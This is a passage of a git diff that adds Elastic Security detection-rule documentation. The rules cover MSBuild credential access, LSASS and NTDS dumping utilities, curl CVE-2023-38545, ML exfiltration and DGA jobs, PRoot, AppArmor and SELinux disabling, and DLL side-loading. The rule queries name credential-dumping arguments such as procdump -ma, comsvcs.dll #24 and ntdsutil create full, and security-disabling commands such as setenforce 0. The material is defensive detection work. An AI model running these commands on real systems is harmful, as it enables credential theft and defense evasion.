Developer Utility + +The Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software. + +Adversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution. + +This rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify the `.csproj` file location. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "windows" and event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")] + [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and + (dll.name : ("vaultcli.dll", "SAMLib.DLL") or file.name : ("vaultcli.dll", "SAMLib.DLL"))] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Windows Credential Manager +** ID: T1555.004 +** Reference URL: https://attack.mitre.org/techniques/T1555/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc new file mode 100644 index 0000000000..0312f515d1 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc @@ -0,0 +1,159 @@ +[[prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities]] +=== Potential Credential Access via Windows Utilities + +Identifies the execution of known Windows utilities often abused to dump LSASS memory or the Active Directory database (NTDS.dit) in preparation for credential access. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* +* logs-system.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Credential Access via Windows Utilities + +Local Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens. + +The `Ntds.dit` file is a database that stores Active Directory data, including information about user objects, groups, and group membership. + +This rule looks for the execution of utilities that can extract credential data from the LSASS memory and Active Directory `Ntds.dit` file. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify what information was targeted. +- Identify the target computer and its role in the IT environment. + +### False positive analysis + +- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- If the host is a domain controller (DC): + - Activate your incident response plan for total Active Directory compromise. + - Review the privileges assigned to users that can access the DCs, to ensure that the least privilege principle is being followed and to reduce the attack surface. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and +( + ( + (process.pe.original_file_name : "procdump" or process.name : "procdump.exe") and process.args : "-ma" + ) or + ( + process.name : "ProcessDump.exe" and not process.parent.executable regex~ """C:\\Program Files( \(x86\))?\\Cisco Systems\\.*""" + ) or + ( + (process.pe.original_file_name : "WriteMiniDump.exe" or process.name : "WriteMiniDump.exe") and + not process.parent.executable regex~ """C:\\Program Files( \(x86\))?\\Steam\\.*""" + ) or + ( + (process.pe.original_file_name : "RUNDLL32.EXE" or process.name : "RUNDLL32.exe") and + (process.args : "MiniDump*" or process.command_line : "*comsvcs.dll*#24*") + ) or + ( + (process.pe.original_file_name : "RdrLeakDiag.exe" or process.name : "RdrLeakDiag.exe") and + process.args : "/fullmemdmp" + ) or + ( + (process.pe.original_file_name : "SqlDumper.exe" or process.name : "SqlDumper.exe") and + process.args : "0x01100*") or + ( + (process.pe.original_file_name : "TTTracer.exe" or process.name : "TTTracer.exe") and + process.args : "-dumpFull" and process.args : "-attach") or + ( + (process.pe.original_file_name : "ntdsutil.exe" or process.name : "ntdsutil.exe") and + process.args : "create*full*") or + ( + (process.pe.original_file_name : "diskshadow.exe" or process.name : "diskshadow.exe") and process.args : "/s") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Sub-technique: +** Name: NTDS +** ID: T1003.003 +** Reference URL: https://attack.mitre.org/techniques/T1003/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc new file mode 100644 index 0000000000..baad9eb5cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc @@ -0,0 +1,68 @@ +[[prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation]] +=== Potential curl CVE-2023-38545 Exploitation + +Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerable command line arguments in conjunction with an unusual command line length. A flaw in curl version <= 8.3 makes curl vulnerable to a heap based buffer overflow during the SOCKS5 proxy handshake. Upgrade to curl version >= 8.4 to patch this vulnerability. This exploit can be executed with and without the use of environment variables. For increased visibility, enable the collection of http_proxy, HTTPS_PROXY and ALL_PROXY environment variables based on the instructions provided in the setup guide of this rule. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://curl.se/docs/CVE-2023-38545.html +* https://daniel.haxx.se/blog/2023/10/11/curl-8-4-0/ +* https://twitter.com/_JohnHammond/status/1711986412554531015 + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and process.name == "curl" +and ( + process.args : ("--socks5-hostname", "--proxy", "--preproxy", "socks5*") or + process.env_vars: ("http_proxy=socks5h://*", "HTTPS_PROXY=socks5h://*", "ALL_PROXY=socks5h://*") +) and length(process.command_line) > 255 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc new file mode 100644 index 0000000000..c7e5514ec8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port]] +=== Potential Data Exfiltration Activity to an Unusual Destination Port + +A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc new file mode 100644 index 0000000000..b1711af6c0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address]] +=== Potential Data Exfiltration Activity to an Unusual IP Address + +A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc new file mode 100644 index 0000000000..8b317d923d --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code]] +=== Potential Data Exfiltration Activity to an Unusual ISO Code + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc new file mode 100644 index 0000000000..baa02b7e4f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region]] +=== Potential Data Exfiltration Activity to an Unusual Region + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc new file mode 100644 index 0000000000..d92d5417b0 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc @@ -0,0 +1,61 @@ +[[prebuilt-rule-8-10-5-potential-defense-evasion-via-proot]] +=== Potential Defense Evasion via PRoot + +Identifies the execution of the PRoot utility, an open-source tool for user-space implementation of chroot, mount --bind, and binfmt_misc. Adversaries can leverage an open-source tool PRoot to expand the scope of their operations to multiple Linux distributions and simplify their necessary efforts. In a normal threat scenario, the scope of an attack is limited by the varying configurations of each Linux distribution. With PRoot, it provides an attacker with a consistent operational environment across different Linux distributions, such as Ubuntu, Fedora, and Alpine. PRoot also provides emulation capabilities that allow for malware built on other architectures, such as ARM, to be run.The post-exploitation technique called bring your own filesystem (BYOF), can be used by the threat actors to execute malicious payload or elevate privileges or perform network scans or orchestrate another attack on the environment. Although PRoot was originally not developed with malicious intent it can be easily tuned to work for one. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://proot-me.github.io/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where event.action == "exec" and process.parent.name =="proot" and host.os.type == "linux" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Exploitation for Defense Evasion +** ID: T1211 +** Reference URL: https://attack.mitre.org/techniques/T1211/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc new file mode 100644 index 0000000000..dcf7e5309c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dga-activity.asciidoc @@ -0,0 +1,58 @@ +[[prebuilt-rule-8-10-5-potential-dga-activity]] +=== Potential DGA Activity + +A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc new file mode 100644 index 0000000000..15d1a95383 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-disabling-of-apparmor]] +=== Potential Disabling of AppArmor + +This rule monitors for potential attempts to disable AppArmor. AppArmor is a Linux security module that enforces fine-grained access control policies to restrict the actions and resources that specific applications and processes can access. Adversaries may disable security tools to avoid possible detection of their tools and activities. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and ( + (process.name == "systemctl" and process.args == "disable" and process.args == "apparmor") or + (process.name == "ln" and process.args : "/etc/apparmor.d/*" and process.args : "/etc/apparmor.d/disable/") +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc new file mode 100644 index 0000000000..d3653b2912 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc @@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-potential-disabling-of-selinux]] +=== Potential Disabling of SELinux + +Identifies potential attempts to disable Security-Enhanced Linux (SELinux), which is a Linux kernel security feature to support access control policies. Adversaries may disable security tools to avoid possible detection of their tools and activities. + +*Rule type*: query + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:(start or process_started) and process.name:setenforce and process.args:0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Sub-technique: +** Name: Disable or Modify Tools +** ID: T1562.001 +** Reference URL: https://attack.mitre.org/techniques/T1562/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc new file mode 100644 index 0000000000..1c4c4ca912 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc @@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs]] +=== Potential DLL Side-Loading via Trusted Microsoft Programs + +Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and + not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or + process.executable : ("?:\\Windows\\explorer.exe", + "?:\\Program Files\\Microsoft 